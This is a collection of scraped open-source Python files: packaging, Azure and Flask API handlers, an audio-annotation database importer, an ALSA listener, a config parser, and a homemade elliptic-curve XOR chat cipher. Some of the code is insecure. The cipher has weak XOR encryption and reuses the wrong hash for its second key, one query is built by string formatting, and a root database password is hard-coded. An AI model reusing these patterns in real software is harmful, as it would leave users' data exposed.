\"\")\n\n","repo_name":"Leeds-MRG/Minos","sub_path":"minos/data_generation/US_complete_case.py","file_name":"US_complete_case.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"73110761127","text":"import os\nimport sys\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.install import install\n\n\n#\n# Metadata & Deps\n#\n\nPACKAGE_NAME = \"bytestring_splitter\"\nBASE_DIR = os.path.dirname(__file__)\n\nABOUT = dict()\nwith open(os.path.join(BASE_DIR, PACKAGE_NAME, \"__about__.py\")) as f:\n exec(f.read(), ABOUT)\n\n\nwith open(os.path.join(BASE_DIR, \"README.md\")) as f:\n long_description = f.read()\n\nwith open(os.path.join(BASE_DIR, \"requirements.txt\")) as f:\n INSTALL_REQUIRES = f.read().split('\\n')\n\nwith open(os.path.join(BASE_DIR, \"dev-requirements.txt\")) as f:\n TESTS_REQUIRE = f.read().split('\\n')\n\n\n#\n# Utility\n#\n\nclass VerifyVersionCommand(install):\n \"\"\"Custom command to verify that the git tag matches our version\"\"\"\n description = 'verify that the git tag matches our version'\n\n def run(self):\n tag = os.getenv('CIRCLE_TAG')\n if tag.startswith('v'):\n tag = tag[1:]\n\n version = ABOUT['__version__']\n if version.startswith('v'):\n version = version[1:]\n\n if tag != version:\n info = \"Git tag: {0} does not match the version of this app: {1}\".format(\n os.getenv('CIRCLE_TAG'), ABOUT['__version__']\n )\n sys.exit(info)\n\n\n#\n# Main\n#\n\nsetup(name=ABOUT['__title__'],\n url=ABOUT['__url__'],\n version=ABOUT['__version__'],\n author=ABOUT['__author__'],\n author_email=ABOUT['__email__'],\n description=ABOUT['__summary__'],\n license=ABOUT['__license__'],\n long_description=long_description,\n\n setup_requires=['pytest-runner'], # required for setup.py test\n tests_require=TESTS_REQUIRE,\n\n extras_require={\"testing\": TESTS_REQUIRE},\n install_requires=INSTALL_REQUIRES,\n\n packages=find_packages(exclude=[\"tests\"]),\n cmdclass={'verify': VerifyVersionCommand},\n\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Natural Language :: English\",\n \"Programming Language :: Python :: Implementation\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Topic :: Software Development :: Libraries :: Python Modules\"\n ]\n )\n","repo_name":"nucypher/bytestringSplitter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"15646039265","text":"import logging\nfrom helper_functions import check_permission, Responses, get_users_company_object, query_container, get_object_attr, get_tuple_string\nfrom helper_functions import UserDoesNotExistException, CompanyNotFoundException, ItemNotFoundException\n\nimport azure.functions as func\n\n# Denys\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info('Python HTTP trigger function to get all users')\n \n try:\n requester_uuid = req.headers.get('X-Request-UUID')\n if not check_permission(requester_uuid):\n return Responses.no_permissions()\n\n company_obj = get_users_company_object(requester_uuid)\n employee_ids = company_obj['employees']\n \n for employee_id in employee_ids:\n try:\n if get_object_attr(employee_id, 'company_id', 'employee_container') != company_obj['id']:\n return Responses.internal_server_error(f\"database inconsistency with user: '{employee_id}'\")\n \n except ItemNotFoundException:\n return Responses.user_not_found(employee_id)\n \n logging.error(\"1\")\n query = f\"SELECT * FROM employee e WHERE e.id IN {get_tuple_string(employee_ids)}\"\n logging.error(\"query: \" + query)\n # params = [{ \"name\":\"@ids\", \"value\": + \")\" }\n employee_objects = query_container(query, None, 'employee_container', filter=False)\n\n return Responses.success_dict({ \"employees\": employee_objects })\n \n except UserDoesNotExistException:\n return Responses.user_not_found(requester_uuid)\n\n except CompanyNotFoundException:\n return Responses.item_not_found(\"user's company\")\n","repo_name":"DanielElmar/3207-Cloud-Application-Development","sub_path":"groupCoursework/backend/all_users/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10632643230","text":"# sender\n\nimport os\nimport tinyec.ec as ec\nimport tinyec.registry as reg\nimport secrets\nimport hashlib\n\ndef textToBin(message):\n\n message = list(message)\n messageStr = \"\"\n\n for i in range(len(message)):\n message[i] = f\"{format(ord(message[i]), 'b'):0>8}\"\n \n for i in range(len(message)):\n messageStr += message[i]\n\n return messageStr\n\ndef xor(m, k):\n\n m = list(m)\n k = list(k)\n\n c = []\n cStr = \"\"\n\n for i in range(len(m)):\n xor = str(int(m[i]) ^ int(k[i]))\n c.append(xor)\n \n for i in range(len(c)):\n cStr += c[i]\n\n return cStr\n\ndef listToStr(list):\n\n str = \"\"\n for i in range(len(list)):\n str += list[i]\n\n return str\n\ncurve = reg.get_curve('secp256r1')\ngenerator = curve.g\norder = curve.field.n\nr = secrets.SystemRandom()\nalpha = r.randrange(1, order) \n\nalphaG = alpha * generator\n\ninput(\"\\n Press 'Enter' to start the public key exchange\")\nf = open(\"message.txt\", \"w\")\nf.write(str(alphaG.x) + \" \" + str(alphaG.y))\nf.close()\n\n\ninput(\"\\n Once Bob has also started the public key exchange, press 'Enter'\")\nf = open(\"message.txt\", \"r\")\nmsg_rcv = f.read()\nf.close()\nos.remove(\"message.txt\")\nprint(\"\\n The inital key has now been generated\")\n\na = \"\"\nb = \"\"\n\nfor i in range(len(msg_rcv)):\n if msg_rcv[i] == \" \":\n break\n else:\n a = a + msg_rcv[i]\n\nfor i in range(len(msg_rcv)):\n if i > (len(a)):\n b = b + msg_rcv[i]\n\nbetaG = ec.Point(curve, int(a), int(b))\nabg = alpha * betaG\n\ninput(\"\\n Press 'Enter' to send a message to Bob\")\nmsg = input(\"Message: \")\nf = open(\"message.txt\", \"w\")\n\nhash1 = hashlib.sha256()\nhash1.update(abg.x.to_bytes(32, \"big\"))\nhash1.update(abg.y.to_bytes(32, \"big\"))\nkey1 = format(int(hash1.hexdigest(), 16), 'b')\n\nkeyList = list(key1)\nkeyLen = int(len(keyList) / 2)\n\nr = []\ns = []\n\nfor i in range(len(keyList)):\n if i < keyLen:\n r.append(keyList[i])\n else:\n s.append(keyList[i])\n\ngammaG = (int(listToStr(r)) * int(listToStr(s))) * generator\n\nhash2 = hashlib.sha256()\nhash2.update(gammaG.x.to_bytes(32, \"big\"))\nhash2.update(gammaG.y.to_bytes(32, \"big\"))\nkey2 = format(int(hash1.hexdigest(), 16), 'b')\n\nkeyFinal = key1 + key2\n\nencMsg = xor(textToBin(msg), keyFinal)\n\nprint(\"\\n The resulting ciphertext is: \" + encMsg)\nprint(\"\\n The final key is: \" + keyFinal)\n\n\nf.write(encMsg)\nf.close() ","repo_name":"cws83/secureChatChannel","sub_path":"Alice.py","file_name":"Alice.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29582948202","text":"from contextlib import contextmanager # noqa\n\ntry:\n from greenlet import getcurrent as get_ident\nexcept ImportError:\n try:\n from six.moves._thread import get_ident\n except ImportError:\n from _thread import get_ident\n\n__all__ = [\"local\", \"Local\", \"get_ident\"]\n\n\n\"\"\"Thread-local/Greenlet-local objects\nThread-local/Greenlet-local objects support the management of\nthread-local/greenlet-local data. If you have data that you want\nto be local to a thread/greenlet, simply create a\nthread-local/greenlet-local object and use its attributes:\n >>> mydata = Local()\n >>> mydata.number = 42\n >>> mydata.number\n 42\n >>> hasattr(mydata, 'number')\n True\n >>> hasattr(mydata, 'username')\n False\n Reference :\n from threading import local\n\"\"\"\n\n\nclass Localbase(object):\n\n __slots__ = (\"__storage__\", \"__ident_func__\")\n\n def __new__(cls, *args, **kwargs):\n self = object.__new__(cls, *args, **kwargs)\n object.__setattr__(self, \"__storage__\", {})\n object.__setattr__(self, \"__ident_func__\", get_ident)\n return self\n\n\nclass Local(Localbase):\n def __iter__(self):\n ident = self.__ident_func__()\n try:\n return iter(list(self.__storage__[ident].items()))\n except KeyError:\n return iter([])\n\n def __release_local__(self):\n self.__storage__.pop(self.__ident_func__(), None)\n\n def __getattr__(self, name):\n ident = self.__ident_func__()\n try:\n return self.__storage__[ident][name]\n except KeyError:\n raise AttributeError(name)\n\n def __setattr__(self, name, value):\n if name in (\"__storage__\", \"__ident_func__\"):\n raise AttributeError(\"{!r} object attribute '{}' is read-only\".format(self.__class__.__name__, name))\n\n ident = self.__ident_func__()\n storage = self.__storage__\n if ident not in storage:\n storage[ident] = dict()\n storage[ident][name] = value\n\n def __delattr__(self, name):\n if name in (\"__storage__\", \"__ident_func__\"):\n raise AttributeError(\"{!r} object attribute '{}' is read-only\".format(self.__class__.__name__, name))\n\n ident = self.__ident_func__()\n try:\n del self.__storage__[ident][name]\n if len(self.__storage__[ident]) == 0:\n self.__release_local__()\n except KeyError:\n raise AttributeError(name)\n\n def clear(self):\n self.__release_local__()\n\n\nlocal = Local()\n\n\n@contextmanager\ndef with_request_local():\n local_vars = {}\n for k in [\"operator\", \"username\", \"current_request\"]:\n if hasattr(local, k):\n local_vars[k] = getattr(local, k)\n delattr(local, k)\n\n try:\n yield local\n finally:\n for k, v in list(local_vars.items()):\n setattr(local, k, v)\n\n\n@contextmanager\ndef with_client_user(username):\n with with_request_local() as local:\n local.username = username\n yield\n\n\n@contextmanager\ndef with_client_operator(update_user):\n with with_request_local() as local:\n local.operator = update_user\n yield\n","repo_name":"TencentBlueKing/bk-log","sub_path":"apps/log_extract/handlers/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"53"} +{"seq_id":"28703783508","text":"from flask import Blueprint, request, jsonify\nfrom marvel_heroes.helpers import token_required\nfrom marvel_heroes.models import db, User, Hero, hero_schema, heroes_schema\n\napi = Blueprint('api', __name__, url_prefix='/api')\n\n@api.route('/getdata')\ndef getData():\n return {'some_hero': 'snapped', 'another_hero': 'unsnapped'}\n\n@api.route('/heroes', methods = ['POST'])\n@token_required\ndef createHero(current_user_token):\n name = request.json['name']\n alter_ego = request.json['alter_ego']\n description = request.json['description']\n comics_appeared_in = request.json['comics_appeared_in']\n super_power = request.json['super_power']\n owner_token = current_user_token.token\n\n hero = Hero(name, alter_ego, description, comics_appeared_in, super_power, owner_token = owner_token)\n\n db.session.add(hero)\n db.session.commit()\n\n response = hero_schema.dump(hero)\n return jsonify(response)\n\n@api.route('/heroes', methods = ['GET'])\n@token_required\ndef getHeroes(current_user_token):\n owner = current_user_token.token\n heroes = Hero.query.filter_by(owner_token = owner).all()\n response = heroes_schema.dump(heroes)\n return jsonify(response)\n\n@api.route('/heroes/', methods = ['GET'])\n@token_required\ndef getHero(current_user_token, id):\n hero = Hero.query.get(id)\n response = hero_schema.dump(hero)\n return jsonify(response)\n\n@api.route('/heroes/', methods = ['POST'])\n@token_required\ndef updateHero(current_user_token, id):\n hero = Hero.query.get(id)\n if hero:\n hero.name = request.json['name']\n hero.alter_ego = request.json['alter_ego']\n hero.description = request.json['description']\n hero.comics_appeared_in = request.json['comics_appeared_in']\n hero.super_power = request.json['super_power']\n hero.owner_token = current_user_token.token\n response = hero_schema.dump(hero)\n return jsonify(response)\n else:\n return jsonify({'Error': \"Sorry. That hero isn't here yet.\"})\n\n@api.route('heroes/', methods = ['DELETE'])\n@token_required\ndef snapHero(current_user_token, id):\n hero = Hero.query.get(id)\n if hero:\n db.session.delete(hero)\n db.session.commit()\n response = hero_schema.dump(hero)\n return jsonify(response)\n else:\n return jsonify({'Error': \"Sorry. That hero isn't here yet.\"})","repo_name":"mikehkaiser/marvle-api","sub_path":"marvel_heroes/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9444244372","text":"# encoding:utf-8\n\nfrom shapely.geometry import Polygon\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\npolygon = Polygon([(0,0),(1, 1), (1, 0)])\n\n\n\ndef plot_examples(colormaps):\n \"\"\"\n Helper function to plot data with associated colormap.\n \"\"\"\n np.random.seed(19680801)\n data = np.random.randn(30, 30)\n n = len(colormaps)\n fig, axs = plt.subplots(1, n, figsize=(n * 2 + 2, 3),\n constrained_layout=True, squeeze=False)\n for [ax, cmap] in zip(axs.flat, colormaps):\n psm = ax.pcolormesh(data, cmap=cmap, rasterized=True, vmin=-4, vmax=4)\n fig.colorbar(psm, ax=ax)\n plt.show()\n os.system(\"pause\")\n\n\ncmap = ListedColormap([\"darkorange\", \"gold\", \"lawngreen\", \"lightseagreen\"])\nplot_examples([cmap])","repo_name":"Qingping-Liu/_Groundwater_Drought","sub_path":"测试shapely.py","file_name":"测试shapely.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18975320565","text":"from pathlib import Path\nfrom typing import Collection, Dict, List\nfrom math import ceil, modf\nfrom mysql.connector import MySQLConnection\nfrom datetime import date, timedelta\nfrom mysql.connector.cursor import MySQLCursor\nfrom tools.logging import debug, info, error\nfrom tools.db.queries import get_id_of_entry_in_table\nfrom tools.file_handling.collect import rename_and_copy_to\nfrom datetime import datetime\nfrom tools.file_handling.name import parse_filename_for_location_date_time\nfrom tools.file_handling.audio import read_parameters_from_audio_file\nfrom tools.configuration import parse_config, DatabaseConfig\nfrom typedconfig.source import IniStringConfigSource\nfrom tools.sub_scripts.record_information import check_get_ids_from_record_informations\nfrom tools.file_handling.annotation import read_raven_file\nfrom tools.db import (\n get_entry_id_or_create_it,\n connectToDB,\n delete_from_table,\n sanitize_name,\n sanitize_altitude,\n)\nfrom tools.TSA_Species_Translator import TSA_Species_Translator\n\nfrom tools.logging import info\nimport argparse\n\n\nclass TSADB:\n classId = 0\n className = 1\n fileName = 2\n collection = 3\n soundType = 4\n duration = 5\n recordist = 6\n country = 7\n locality = 8\n elevation = 9\n date = 10\n time = 11\n quality = 12\n backgroundSpecies = 13\n srcFileName = 14\n remarks = 15\n created = 16\n modified = 17\n dbId = 17\n\n\ndb = TSADB()\n\n\nCONFIG_FILE_PATH = Path(\"config.cfg\")\n\nTSA_CONFIG = \"\"\"\n[database]\nuser = root\nhost = localhost\nport = 3306\npassword = pass2root\nname = tsa_data\nfile_storage_path = /tmp/\n\"\"\"\ntsaConfig = DatabaseConfig()\ntsaConfig.add_source(IniStringConfigSource(TSA_CONFIG))\n\nDATA_PATH = Path(\"/mnt/z/AG/TSA/Mario/_Backups/TsaOrgTrainAudioData/\")\nTEST_RUN = True\n# CollectionName, SubFolders,\nCOLLECTIONS = [\n (\"TsaShorts\", \"ShortsAll\", False),\n # (\"CD014\", \"VogelCDs\", False),\n # (\"CD043\", \"VogelCDs\", False),\n # (\"CD041\", \"VogelCDs\", False),\n # (\"CD058\", \"VogelCDs\", False),\n # (\"CD124\", \"VogelCDs\", False),\n # (\"CD126\", \"VogelCDs\", False),\n # (\"CD127\", \"VogelCDs\", False),\n # (\"CD901\", \"VogelCDs\", False),\n # (\"CD097\", \"VogelCDs\", False),\n # (\"CD123\", \"VogelCDs\", False),\n # (\"CD001\", \"VogelCDs\", False),\n # (\"CD002\", \"VogelCDs\", False),\n # (\"CD003\", \"VogelCDs\", False),\n # (\"CD004\", \"VogelCDs\", False),\n # (\"Nachtigall01\", \"Nachtigall01\", False),\n # (\"TsaJorn\", \"TsaJorn\", False),\n # (\"RefSys\", \"RefSys\", False),\n]\n\n\ndef import_data(data_path=DATA_PATH, config_file_path=CONFIG_FILE_PATH) -> List[str]:\n config = parse_config(config_file_path)\n\n info(\"Load Data from database\")\n failed_species_labels = {}\n with connectToDB(tsaConfig) as db_connection_tsa, connectToDB(\n config.database\n ) as db_connection_la:\n with db_connection_tsa.cursor(buffered=True) as db_cursor_tsa:\n with db_connection_la.cursor(buffered=True) as db_cursor_la:\n species_translator = TSA_Species_Translator(db_cursor_la)\n for collection in COLLECTIONS:\n info(\"Import collection {}\".format(collection))\n collection_entry = [\n (\"name\", collection[0]),\n (\"remarks\", None),\n ]\n collection_id = get_entry_id_or_create_it(\n db_cursor_la, \"collection\", collection_entry, collection_entry\n )\n\n labels = do_collection_data_import(\n db_connection_la,\n db_cursor_tsa,\n db_cursor_la,\n collection[0],\n collection_id,\n collection[1],\n collection[2],\n config.database.get_originals_files_path(),\n failed_species_labels,\n species_translator,\n data_path,\n )\n info(failed_species_labels)\n\n\ndef do_collection_data_import(\n db_connection_la: MySQLConnection,\n db_cursor_tsa: MySQLCursor,\n db_cursor_la: MySQLCursor,\n collection: str,\n collection_id: int,\n collection_path: str,\n use_src_filename: bool,\n orginal_path: Path,\n failed_species_labels,\n species_translator: TSA_Species_Translator,\n data_path: Path,\n):\n db_cursor_tsa.execute(\n \"\"\"SELECT \n t1.Date, /* 0 */\n t1.Time, /* 1 */ \n t1.Duration, /* 2 */ \n t1.SrcFileName, /* 3 */ \n t1.Recordist, /* 4 */ \n t1.Country, /* 5 */ \n t1.Locality, /* 6 */ \n t1.Latitude, /* 7 */ \n t1.Longitude, /* 8 */ \n t1.Elevation, /* 9 */\n t1.Quality, /* 10 */\n t1.FileName, /* 11 */\n t1.ClassName, /* 12 */\n t1.SoundType, /* 13 */\n t2.English_Name /*14*/\n FROM train_europe_v02 as t1\n LEFT JOIN system as t2 on t1.ClassName = t2.Artname\n WHERE Collection = %s\"\"\",\n (collection,),\n )\n failed_annotations = []\n count = db_cursor_tsa.rowcount\n data = db_cursor_tsa.fetchall()\n i = 0\n for row in data:\n if i % 100 == 0:\n info(\"imported {}/{}\".format(i, count))\n i = i + 1\n\n if use_src_filename:\n audio_filepath = data_path.joinpath(collection_path).joinpath(row[3])\n else:\n audio_filepath = data_path.joinpath(collection_path).joinpath(\n row[11] + \".wav\"\n )\n\n if audio_filepath.exists() is False:\n error(\"File does not exhist {}\".format(audio_filepath.as_posix()))\n continue\n\n audio_file_parameters = None\n try:\n audio_file_parameters = read_parameters_from_audio_file(audio_filepath)\n except:\n error(\"Could not read audio Parameters from {}\".format(audio_filepath))\n continue\n target_record_file_path = \"{}/{}/{}\".format(\n audio_file_parameters.md5sum[0],\n audio_file_parameters.md5sum[1],\n audio_file_parameters.md5sum[2],\n )\n person_entry = [(\"name\", sanitize_name(row[4], 128))]\n person_id = get_entry_id_or_create_it(\n db_cursor_la, \"person\", person_entry, person_entry\n )\n location_entry = [\n (\"name\", sanitize_name(\"{} {}\".format(row[5], row[6]), 256)),\n (\"description\", None),\n (\"habitat\", None),\n (\"lat\", row[7]),\n (\"lng\", row[8]),\n (\"altitude\", row[9]),\n (\"remarks\", None),\n ]\n # print(location_entry)\n location_id = get_entry_id_or_create_it(\n db_cursor_la,\n \"location\",\n [\n (\"name\", location_entry[0][1]),\n (\"description\", None),\n (\"habitat\", None),\n (\"remarks\", None),\n ],\n location_entry,\n )\n\n time = None\n end = None\n\n if row[1] is not None and row[0] is not None:\n timestamp = datetime.combine(row[0], datetime.min.time()) + row[1]\n time = timestamp.time()\n end = timestamp + timedelta(seconds=ceil(row[2]))\n\n record_data = [\n (\"date\", row[0]),\n (\"time\", time),\n #(\"end\", end,),\n (\"duration\", row[2],),\n (\"sample_rate\", audio_file_parameters.sample_rate),\n (\"bit_depth\", audio_file_parameters.bit_depth),\n (\"bit_rate\", audio_file_parameters.bit_rate),\n (\"channels\", audio_file_parameters.channels),\n (\"mime_type\", audio_file_parameters.mime_type),\n (\"original_filename\", audio_file_parameters.original_filename),\n (\"filename\", audio_file_parameters.filename),\n (\"file_path\", target_record_file_path),\n (\"md5sum\", audio_file_parameters.md5sum),\n (\"location_id\", location_id),\n (\"recordist_id\", person_id),\n (\"equipment_id\", None),\n (\"collection_id\", collection_id),\n (\"license\", None),\n ]\n (record_id, created) = get_entry_id_or_create_it(\n db_cursor_la,\n \"record\",\n [(\"md5sum\", audio_file_parameters.md5sum)],\n data=record_data,\n info=True,\n )\n if TEST_RUN is False:\n db_connection_la.commit()\n if created:\n targetDirectory = orginal_path.joinpath(target_record_file_path)\n targetDirectory.mkdir(parents=True, exist_ok=True)\n rename_and_copy_to(\n audio_filepath, targetDirectory, audio_file_parameters.filename,\n )\n\n # remove all old annotations\n delete_from_table(\n db_cursor_la, \"annotation_of_species\", [(\"record_id\", record_id)]\n )\n print(\"File Copyied {}\".format(audio_file_parameters.filename))\n db_connection_la.commit()\n\n species_id = species_translator.get_species_id(db_cursor_la, row[12], row[14])\n if species_id is None:\n failed_annotations.append(row[12])\n info(\"Missing species {}\", (row[12]))\n continue\n\n annoation_data = [\n (\"record_id\", record_id),\n (\"species_id\", species_id),\n (\"individual_id\", None),\n (\"group_id\", None),\n (\"vocalization_type\", None),\n (\"quality_tag\", row[10]),\n (\"id_level\", 1),\n (\"channel_ix\", audio_file_parameters.channels),\n (\"start_time\", 0),\n (\"end_time\", row[2]),\n (\"start_frequency\", None),\n (\"end_frequency\", None),\n (\"annotator_id\", person_id),\n ]\n\n get_entry_id_or_create_it(\n db_cursor_la,\n \"annotation_of_species\",\n query=annoation_data,\n data=annoation_data,\n )\n if TEST_RUN is False:\n db_connection_la.commit()\n\n # # to distinct species values\n failed_species_labels.update(set(failed_annotations))\n\n info(\"Failed annotations not matched species {}\".format(len(failed_annotations)))\n # # read_raven_file(corresponding_files.annoation_file)\n\n return failed_species_labels\n\n\nparser = argparse.ArgumentParser(description=\"\")\nparser.add_argument(\n \"--data\",\n metavar=\"path\",\n type=Path,\n nargs=\"?\",\n help=\"target folder\",\n default=DATA_PATH,\n)\nparser.add_argument(\n \"--config\",\n metavar=\"path\",\n type=Path,\n nargs=\"?\",\n default=CONFIG_FILE_PATH,\n help=\"config file with database credentials\",\n)\nargs = parser.parse_args()\nif __name__ == \"__main__\":\n import_data(args.data, args.config)\n","repo_name":"hdogan84/database","sub_path":"src/import_scripts/import_annoations_tsa.py","file_name":"import_annoations_tsa.py","file_ext":"py","file_size_in_byte":10783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17762657802","text":"from pyalsa import alsahcontrol\nimport sys\nimport time\nimport select\nimport threading\n\nLOOPBACK_ACTIVE = \"PCM Slave Active\"\nLOOPBACK_CHANNELS = \"PCM Slave Channels\"\nLOOPBACK_FORMAT = \"PCM Slave Format\"\nLOOPBACK_RATE = \"PCM Slave Rate\"\nLOOPBACK_VOLUME = \"PCM Playback Volume\"\nGADGET_PB_RATE = \"Playback Rate\"\nGADGET_CAP_RATE = \"Capture Rate\"\n\nINTERFACE_PCM = alsahcontrol.interface_id[\"PCM\"]\nINTERFACE_MIXER = alsahcontrol.interface_id['MIXER']\nEVENT_VALUE = alsahcontrol.event_mask[\"VALUE\"]\nEVENT_INFO = alsahcontrol.event_mask[\"INFO\"]\nEVENT_REMOVE = alsahcontrol.event_mask_remove\n\n\nclass ControlListener:\n def __init__(self, device):\n self.get_card_device_subdevice(device)\n self.hctl = alsahcontrol.HControl(\n self._card, mode=alsahcontrol.open_mode[\"NONBLOCK\"]\n )\n\n self.elements = self.hctl.list()\n\n self._active = self.find_element(LOOPBACK_ACTIVE, INTERFACE_PCM)\n self._channels = self.find_element(LOOPBACK_CHANNELS, INTERFACE_PCM)\n self._format = self.find_element(LOOPBACK_FORMAT, INTERFACE_PCM)\n self._rate = self.find_element(LOOPBACK_RATE, INTERFACE_PCM)\n if self._rate is None:\n self._rate = self.find_element(GADGET_CAP_RATE, INTERFACE_PCM)\n\n self._volume = self.find_element(LOOPBACK_VOLUME, INTERFACE_MIXER, device=0, subdevice=0)\n\n self._active_elem = None\n self._channels_elem = None\n self._format_elem = None\n self._rate_elem = None\n self._volume_elem = None\n\n if self._active is not None:\n self._active_elem = alsahcontrol.Element(self.hctl, self._active)\n self._active_elem.set_callback(self)\n if self._channels is not None:\n self._channels_elem = alsahcontrol.Element(self.hctl, self._channels)\n self._channels_elem.set_callback(self)\n if self._format is not None:\n self._format_elem = alsahcontrol.Element(self.hctl, self._format)\n self._format_elem.set_callback(self)\n if self._rate is not None:\n self._rate_elem = alsahcontrol.Element(self.hctl, self._rate)\n self._rate_elem.set_callback(self)\n if self._volume is not None:\n self._volume_elem = alsahcontrol.Element(self.hctl, self._volume)\n self._volume_elem.set_callback(self)\n\n self._active_events = []\n self._channels_events = []\n self._format_events = []\n self._rate_events = []\n self._volume_events = []\n self._new_events = False\n self._active = True\n\n self.poller = select.poll()\n for fd in self.hctl.poll_fds:\n self.poller.register(fd[0], fd[1])\n\n def get_card_device_subdevice(self, dev):\n parts = dev.split(\",\")\n if len(parts) >= 3:\n self.subdev_nbr = int(parts[2])\n else:\n self.subdev_nbr = 0\n if len(parts) >= 2:\n self.device_nbr = int(parts[1])\n else:\n self.device_nbr = 0\n self._card = parts[0]\n\n def find_element(self, wanted_name, interface, device=None, subdevice=None):\n if device is None:\n device=self.device_nbr\n if subdevice is None:\n subdevice=self.subdev_nbr\n found = None\n for idx, iface, dev, subdev, name, _ in self.elements:\n print(\"search\", idx, dev, subdev, name)\n if (\n name == wanted_name\n and dev == device\n and subdev == subdevice\n and iface == interface\n ):\n found = idx\n print(f\"Found control '{wanted_name}' with index {idx}\")\n break\n return found\n\n def read_value(self, elem):\n if elem is None:\n return None\n info = alsahcontrol.Info(elem)\n val = alsahcontrol.Value(elem)\n values = val.get_tuple(info.type, info.count)\n val.set_tuple(info.type, values)\n val.read()\n return values[0]\n\n def callback(self, el, mask):\n if mask == EVENT_REMOVE:\n self._active = False\n elif mask & EVENT_INFO:\n info = alsahcontrol.Info(el)\n if info.is_inactive:\n self._active = False\n elif mask & EVENT_VALUE:\n val = self.read_value(el)\n self._new_events = True\n if el.numid == self._active:\n self._active_events.append(val)\n elif el.numid == self._channels:\n self._channels_events.append(val)\n elif el.numid == self._format:\n self._format_events.append(val)\n elif el.numid == self._rate:\n self._rate_events.append(val)\n\n def read_all(self):\n print(\"--- Current values ---\")\n print(\"Active:\", self.read_value(self._active_elem))\n print(\"Rate:\", self.read_value(self._rate_elem))\n print(\"Channels:\", self.read_value(self._channels_elem))\n print(\"Format:\", self.read_value(self._format_elem))\n print(\"Volume:\", self.read_value(self._volume_elem))\n\n def pollingloop(self):\n while True:\n time.sleep(0.001)\n pollres = self.poller.poll()\n print(pollres)\n if pollres:\n print(\"triggered\")\n self.hctl.handle_events()\n\n def run(self):\n th = threading.Thread(target=self.pollingloop, daemon=True)\n th.start()\n while True:\n time.sleep(0.1)\n if self._new_events:\n self.read_all()\n self._new_events = False\n # print(\"loop\", self._active_events, self._rate_events, self._format_events, self._channels_events)\n\n\nif __name__ == \"__main__\":\n listener = ControlListener(\"hw:Loopback,1,0\")\n listener.run()\n","repo_name":"HEnquist/camilladsp-controller","sub_path":"pyalsa_class.py","file_name":"pyalsa_class.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11554484754","text":"# https://www.acmicpc.net/problem/5622\n\ncheck_list = []\n\nfor i in range(3, 11):\n if i == 8 or i == 10:\n for j in range(4):\n check_list.append(i)\n else:\n for j in range(3):\n check_list.append(i)\n\ninput_str = input()\n\nresult_int = 0\n\nfor i in input_str:\n result_int += check_list[ord(i) - 65]\n\nprint(result_int)","repo_name":"Gnoyh/baekjoon-python","sub_path":"baekjoon_5622.py","file_name":"baekjoon_5622.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9299745647","text":"import os\n\n\nclass SyntaxError(Exception):\n def __init__(self, path, line, msg):\n super().__init__('Syntax error in {}:{}: {}'.format(\n path, line, msg))\n\n\nclass ConfigurationError(Exception):\n pass\n\n\nclass MissingError(ConfigurationError):\n def __init__(self, name):\n super().__init__('Missing required property `{}`.'.format(name))\n\n\nclass TypeError(ConfigurationError):\n def __init__(self, name, value, exp_type):\n msg = 'Property `{}` expected to be {} type but {} found.'.format(\n name, exp_type.__name__, type(value))\n super().__init__(msg)\n\n\nclass Config(dict):\n def __init__(self, path):\n super().__init__()\n self.path = path\n\n\ndef get(config, name, prop_type, default=None):\n if name not in config:\n return default\n if type(config[name]) is not prop_type:\n raise TypeError(name, config[name], prop_type)\n\n return config[name]\n\n\ndef get_required(config, name, prop_type):\n v = get(config, name, prop_type)\n if v == None:\n raise MissingError(name)\n\n return v\n\n\ndef isstr(s):\n if len(s) < 3:\n return False\n\n if not (s.startswith('\"') and s.endswith('\"')\n or s.startswith(\"'\") and s.endswith(\"'\")):\n return False\n\n return True\n\n\ndef isnum(s):\n return s.isnumeric()\n\n\ndef isbool(s):\n return s == 'true' or s == 'false'\n\n\ndef parse(path):\n config = Config(path)\n lineno = 0\n with open(path, 'r') as f:\n for l in f:\n lineno += 1\n l = l.strip()\n if not l:\n continue\n if l.startswith('#'):\n continue\n\n pts = l.split('=', 1)\n if len(pts) != 2:\n msg = 'Invalid line syntax. key=value format expected.'\n raise SyntaxError(path, lineno, msg)\n\n n, v = pts\n n = n.strip()\n v = v.strip()\n\n if isstr(v):\n config[n] = v[1:-1]\n elif isnum(v):\n config[n] = int(v)\n elif isbool(v):\n if v == 'true':\n config[n] = True\n elif v == 'false':\n config[n] = False\n else:\n raise AssertionError('Must not happen.')\n else:\n msg = ('Invalid value format. String, '\n 'integer and boolean are supported.')\n raise SyntaxError(path, lineno, msg)\n\n return config\n\n\n# TODO: Add configuration name based on conf-file to support\n# multiple instances of the single module.\ndef load_configs(path):\n configs = 